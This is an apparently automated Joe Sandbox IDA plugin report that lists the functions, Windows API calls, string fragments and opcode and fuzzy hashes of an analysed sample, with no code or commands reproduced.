                                                                        • String ID: v^[I$v^[I$v^[I$v^[I$v^[I$v^[I$v^[I$w^[I$w^[I$0FJ$0FJ$0FJ$WM$WM$WM$WM
                                                                        • API String ID: 878851027-139137744
                                                                        • Opcode ID: f08bceee975cf997faea1afb0c8170025138868427c92bdf9f81817beda6ccd2
                                                                        • Instruction ID: 192f313dfa5d013ff816be086c14c440fca8ba15a451cac2d28b25c3d1cf6bc0
                                                                        • Opcode Fuzzy Hash: f08bceee975cf997faea1afb0c8170025138868427c92bdf9f81817beda6ccd2
                                                                        • Instruction Fuzzy Hash: 3AD17C36F105058FDF08CA79C8963FF7BE39BA9304F199069E805EB351C9AB8C068B51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: str$+`^z$+`^z$+`^z$+`^z$+`^z$+`^z$+`^z$+`^z$@/}5$@/}5$@/}5$@/}5$eam $erro$ream
                                                                        • API String ID: 0-912191643
                                                                        • Opcode ID: 3d2f14184932ff61a6fe2f39a2a35c84c15c145f895d14d63e9c4ee8ff262e47
                                                                        • Instruction ID: e445dc19bfe5befd8919bd00780ad170a4fd16a81464c322a89a01458f378e91
                                                                        • Opcode Fuzzy Hash: 3d2f14184932ff61a6fe2f39a2a35c84c15c145f895d14d63e9c4ee8ff262e47
                                                                        • Instruction Fuzzy Hash: EF424B766196018BCB28CE28C4E13BB7FD2EBD6300F2598AED046CB355DB35CD468B52
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: __floor_pentium4
                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                        • API String ID: 4168288129-2761157908
                                                                        • Opcode ID: 1aba2d55161c1fcde7f4814ddfe0d6a272d4e2a5c60b76bcc09a71fa74c2a126
                                                                        • Instruction ID: 2736f0b01148e289ce7be39271d14015a44241731fc00b5373d06e7b5e62fb5b
                                                                        • Opcode Fuzzy Hash: 1aba2d55161c1fcde7f4814ddfe0d6a272d4e2a5c60b76bcc09a71fa74c2a126
                                                                        • Instruction Fuzzy Hash: D1D20771E082298FDB65CE28DD80BEAB7F5EB44315F1541EAD40DE7240EB78AE858F41
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00BD4A5C,00000002,00000000,?,?,?,00BD4A5C,?,00000000), ref: 00BD5124
                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00BD4A5C,00000002,00000000,?,?,?,00BD4A5C,?,00000000), ref: 00BD514D
                                                                        • GetACP.KERNEL32(?,?,00BD4A5C,?,00000000), ref: 00BD5162
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID: ACP$OCP
                                                                        • API String ID: 2299586839-711371036
                                                                        • Opcode ID: f7243777a27f5be818cc7d63d64433997444016a51d32ac06cccdb9f260b2d49
                                                                        • Instruction ID: 4db96298798f0524e0f7c4cad78e7b1bd9d709169443a452820f34dc0629f43e
                                                                        • Opcode Fuzzy Hash: f7243777a27f5be818cc7d63d64433997444016a51d32ac06cccdb9f260b2d49
                                                                        • Instruction Fuzzy Hash: DA218372700901AAEB348F14CD42B97F6E6EF64B54B5684E6E90AE7310FB32DD41C790
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: `[c$`[c$`[c$`[c
                                                                        • API String ID: 0-528005835
                                                                        • Opcode ID: d7e910b27f205712300ae98df389b2e095462845a068cf109d477db21b87e66d
                                                                        • Instruction ID: ab9fc65090ec5bec1b289e9c821e92b66d4103e35497956c4a0c7efb9b2f90a4
                                                                        • Opcode Fuzzy Hash: d7e910b27f205712300ae98df389b2e095462845a068cf109d477db21b87e66d
                                                                        • Instruction Fuzzy Hash: 7D233836A146408FDB68CA38C4E53FB77D2ABD5310F25986ED889C7351DEB6CC498B42
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LV{w$LV{w$m6F-$m6F-$m6F-$m6F-
                                                                        • API String ID: 0-2110170497
                                                                        • Opcode ID: f6110e3bf0563b74627925d2ea599633b31e0132ad7949aa2ac1266aa7f050ef
                                                                        • Instruction ID: 16cfb95ae114b5d42ea3601729547ccc65d9394534fede2669d6ffa056f20dd0
                                                                        • Opcode Fuzzy Hash: f6110e3bf0563b74627925d2ea599633b31e0132ad7949aa2ac1266aa7f050ef
                                                                        • Instruction Fuzzy Hash: 96C15B367482014FDB18C938C4E67EB7BD29BE7310F29986ED889C7352D9678C499F41
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00BD4A2E
                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00BD4A6C
                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00BD4A7F
                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00BD4AC7
                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00BD4AE2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                        • String ID:
                                                                        • API String ID: 415426439-0
                                                                        • Opcode ID: 1f88c47bd9bec80e66eb3e50bf54812b3c63bce88b4afa942f88de7f0911cf92
                                                                        • Instruction ID: aad8c6a5c21427488f762a4e0b6ea3725cc816ecef34e7247ea368347b41fc4f
                                                                        • Opcode Fuzzy Hash: 1f88c47bd9bec80e66eb3e50bf54812b3c63bce88b4afa942f88de7f0911cf92
                                                                        • Instruction Fuzzy Hash: D4514C71A00205AFDB10DFA5DC85BAEB7F8EF19701F1545AAE910EB290FB70DA00CB61
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: P,j$Q,j$Q,j$cOgo$cOgo
                                                                        • API String ID: 0-3108151319
                                                                        • Opcode ID: 4940fd784e6ea84fe21e3c81f5ae76016fe7aed4517c8fa3da5900e48fa11dbf
                                                                        • Instruction ID: f1ef3466960f43e3e06c751588a7c55f301fc5229fa0e08baf48966439f1cbd7
                                                                        • Opcode Fuzzy Hash: 4940fd784e6ea84fe21e3c81f5ae76016fe7aed4517c8fa3da5900e48fa11dbf
                                                                        • Instruction Fuzzy Hash: 2D325877B696014BAB1CC93DCC963BE66C35BD8314F1E98AEE45AD7380DDBCC8418246
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: std::invalid_argument::invalid_argument
                                                                        • String ID: LV{w$LV{w$m6F-$m6F-$vector too long
                                                                        • API String ID: 2141394445-3611547895
                                                                        • Opcode ID: 68bb04292d72dce439f5a9ea97841275da25f5bd83c86ad6e20606b2929d5463
                                                                        • Instruction ID: 3f8e3bc299f5584ec2a8f9bd5b78df9e3079a463072764293d4e122b6d7224ba
                                                                        • Opcode Fuzzy Hash: 68bb04292d72dce439f5a9ea97841275da25f5bd83c86ad6e20606b2929d5463
                                                                        • Instruction Fuzzy Hash: 2DE18B36B182018FDB18CE29C8E53EB77D2ABDA300F19946ED45AC7351DA79CC499B41
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: +<ur$+<ur$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                        • API String ID: 0-3932728395
                                                                        • Opcode ID: 08da5fa81c38ad2e7969babbf1302655d165046a96e30462012b33f709616a13
                                                                        • Instruction ID: 39e0f275d127364f31c8ef97199f802f6bef49400ec7c54e128c43ab72a4c8a1
                                                                        • Opcode Fuzzy Hash: 08da5fa81c38ad2e7969babbf1302655d165046a96e30462012b33f709616a13
                                                                        • Instruction Fuzzy Hash: DAA1BA3BF69B241B6B1CC4670CD267A65C397C8354B6FD1BE896EE7246DEBD8C020180
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cd75ffd76165e19137e0b0c20db2cd9f8180ca2029d34b93e14d1d1f846bb4c4
                                                                        • Instruction ID: 6c83d2f1f0f669b318d62b0f49a6bcd7551615a987fd61a833cacaa79236ec6b
                                                                        • Opcode Fuzzy Hash: cd75ffd76165e19137e0b0c20db2cd9f8180ca2029d34b93e14d1d1f846bb4c4
                                                                        • Instruction Fuzzy Hash: 1E022A71E012199BDB14CFA9D880BAEBBF1FF58314F2482ADE519E7341D731AD418B94
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BD575D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: b12be93f9f424d2e569b7f0b39510d14b1f4d237ad434c9a17b57cf624461fb9
                                                                        • Instruction ID: e86998303687db4e05a817bb81d4f7d934857b308c8959ddd83f731f7cc148c6
                                                                        • Opcode Fuzzy Hash: b12be93f9f424d2e569b7f0b39510d14b1f4d237ad434c9a17b57cf624461fb9
                                                                        • Instruction Fuzzy Hash: 5571E171905559AFDB30AF28CC89ABAFBF9EB05300F5441EAE049A7311EA319E859F14
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00BC0D4A
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00BC0E16
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BC0E36
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00BC0E40
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 8830399152149582576a4d3f17d13e89694bdd86523170f88eccb95077b790a2
                                                                        • Instruction ID: e22144329eff78acda71640d853957dc93f00c1f07c3e97a47c230836837f337
                                                                        • Opcode Fuzzy Hash: 8830399152149582576a4d3f17d13e89694bdd86523170f88eccb95077b790a2
                                                                        • Instruction Fuzzy Hash: 3F31E575D55218DBDB20EFA4D989BCDBBF8AF18300F1041EAE409AB250EB719A858F45
                                                                        APIs
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00BB4F64
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00BB5221
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                        • String ID:
                                                                        • API String ID: 593203224-0
                                                                        • Opcode ID: 4adddc10a25d94730be2aa94e9771da21ddd7bbc1723643e37ae3cb65ce3818d
                                                                        • Instruction ID: ed73f4af7efc52af1006ed04b31c152c558155d1eb135deb85631fc03e082bf4
                                                                        • Opcode Fuzzy Hash: 4adddc10a25d94730be2aa94e9771da21ddd7bbc1723643e37ae3cb65ce3818d
                                                                        • Instruction Fuzzy Hash: C56125767157014FCB28CE2988D63FA77D2EBA8350F144C6EE84AC7351DA79CC498A53
                                                                        APIs
                                                                          • Part of subcall function 00BCF9CB: GetLastError.KERNEL32(00000000,?,00BD1D01), ref: 00BCF9CF
                                                                          • Part of subcall function 00BCF9CB: SetLastError.KERNEL32(00000000,?,?,00000028,00BCA98F), ref: 00BCFA71
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00BD4C66
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00BD4CB0
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00BD4D76
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 661929714-0
                                                                        • Opcode ID: f886b6ad3b64423786af62ee6f145b50282003f162604271913aa85539ff2c6a
                                                                        • Instruction ID: bda0e28013c235e3e492834c0b9b84730005752129e12bdb3de2b3ec6a003e8c
                                                                        • Opcode Fuzzy Hash: f886b6ad3b64423786af62ee6f145b50282003f162604271913aa85539ff2c6a
                                                                        • Instruction Fuzzy Hash: 98616C71610207ABDB289F25C982BAAB7E9EF04300F1445FAE919CB285FB74DD85CB50
                                                                        APIs
                                                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00BCA472
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00BCA47C
                                                                        • UnhandledExceptionFilter.KERNEL32(C0C2CD26,?,?,?,?,?,00000000), ref: 00BCA489
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                        • String ID:
                                                                        • API String ID: 3906539128-0
                                                                        • Opcode ID: d700ff67eef3aa560aeabc8a3ab762ee8b89e97a05647e51747d263d99a2b86f
                                                                        • Instruction ID: b7c24b4b691f2ff509f002f3cd68b25cff7d47851b7b33ec0c55c77f7712659a
                                                                        • Opcode Fuzzy Hash: d700ff67eef3aa560aeabc8a3ab762ee8b89e97a05647e51747d263d99a2b86f
                                                                        • Instruction Fuzzy Hash: BD31B1749112289BCB21DF24D989BCDBBF8BF18310F5041EAE41CA7260EB709F858F45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279145817.0000000000BEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279162447.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279218738.0000000000BF7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: cbF$cbF$o
                                                                        • API String ID: 0-1043606144
                                                                        • Opcode ID: 17cf376e9858c4b881f4ea818175bed4588230ac153b6542e63e5b8739472652
                                                                        • Instruction ID: 6a4c46bf07303d079c19be7f84cea2724602b076a2a68351eabe9ad65649262d
                                                                        • Opcode Fuzzy Hash: 17cf376e9858c4b881f4ea818175bed4588230ac153b6542e63e5b8739472652
                                                                        • Instruction Fuzzy Hash: EF22477BF69A104FA718C9B9CCC27AAA6C357D8314F1F956D9898E7310DAFCCC060281
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2279043918.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                        • Associated: 00000000.00000002.2279023228.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279071566.0000000000BE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2279089498.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
